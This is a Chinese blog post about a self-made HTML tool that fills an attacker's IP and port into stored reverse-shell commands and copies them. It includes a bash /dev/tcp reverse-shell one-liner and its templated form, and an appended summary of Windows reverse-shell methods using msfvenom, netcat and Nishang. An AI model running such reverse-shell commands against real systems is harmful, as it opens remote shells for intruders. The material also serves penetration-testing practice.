windows 反弹shell_HTML单文件小工具反弹shell备忘录

0x00 前言

好久不见

0x01 工具介绍

起因是, 每次需要弹shell的时候都要去翻笔记, 或者找一些编码网站编码payload, 改完IP再复制还总是容易出错...

于是写了下面这个HTML单文件版的小工具, 如下

3496585d40f306789e839f582a40ecbf.png

PS: 懒的美化了(其实是不会)

事件功能一:

在LHOST与LPORT输入IP及端口, 点击确认后会被自动填充到各个反弹shell语句当中, 告别手动修改

43556b0f16ab7f8a591a47839c9ba8be.png

事件功能二:

给反弹shell语句用复选框做了分类, 遇到linux选linux, 遇到windows选windows..., 告别眼花缭乱

fd53bf8687985e33074beeae6114a72e.png

事件功能三:

每个语句后面都有一个按钮, 点击即可复制, 告别按着鼠标左键不松

4e33a779bfd02b109a5687128b3b9c44.png

事件功能四:

加了提示语句属性, 鼠标停留在反弹shell语句上即可查看提示, 告别...
嗯...这个不知道告别啥, 那就提前祝兄弟姐妹们新年快乐吧

57f28c5e4685d61da234dc67b4fe92eb.png

0x02 如何自定义

最开始是使用html写死的, 发现语句扩展起来全是重复的标签代码, 也比较繁琐, 于是用js重写了一个版本

d9b8ad87497b765eae65aa917bd6d367.png

如上图, 你可以加入自己常用的payload语句,如

["linux", `bash -i >& /dev/tcp/127.0.0.1/4444 0>&1`, "这里可以写提示语句"]

将IP用${lhost.value}替换掉, 端口用${lport.value}替换掉, 变为:

["linux", `bash -i >& /dev/tcp/${lhost.value}/${lport.value} 0>&1`, "这里可以写提示语句"],

如果你很熟悉这个语句, 提示文本忽略不写即可, 如下:

["linux", `bash -i >& /dev/tcp/${lhost.value}/${lport.value} 0>&1`],

如果你需要新建一个分类, 举例先添加一个语句如下:

["abc123", `xxx xxx`, "这是一个新的分类"],

11a5ab082369d68718e382c3e494ee6c.png

在这个位置加入一组新的及标签, 标记位置改为 abc123 与之统一即可

for="abc123">abc123: label><input id="abc123" type="checkbox" name="payload_type" onclick="choose()" checked="true">

36b368b2f0916a5d481372e49bd2a476.png

0x03 结束语

js事件都已经写好了, 反弹shell语句自己添加即可(实际中我自己用的语句也并不多)

后台回复: 20201203 即可获取工具文件

0x04 参考文章

https://forum.ywhack.com/shell.php

https://mp.weixin.qq.com/s/uXnPctlOBmciHM4Q-7oquw

说明: 文章不保证内容完全准确, 文中如有错误还请多多指出, 共同进步.

f8ec6d20c9b24a7722acfb15fad90aec.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows系统中,反弹shell是一种常见的攻击技术,用于获取对目标机器的远程访问权限。有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的木马,然后开启监听端口。目标机在命令提示符下执行生成的powershell脚本,即可实现反弹shell。需要注意的是,有时由于防火墙的原因,控制可能会不稳定。\[1\] 另一种方法是使用nc(netcat)工具进行反弹。通过nc反弹得到的shell可能不是一个完全交互的shell,某些命令可能无效。相比之下,通过Python脚本得到的shell可以实现对被控制主机的任意操作。\[2\] 此外,还有一些基于PowerShell的攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit框架、nc工具以及基于PowerShell的攻击框架。具体选择哪种方法取决于实际需求和环境。 #### 引用[.reference_title] - *1* *2* [Windows反弹shell的方式](https://blog.csdn.net/ws1813004226/article/details/117248359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Windows反弹shell的方法](https://blog.csdn.net/qq_39101049/article/details/96191861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值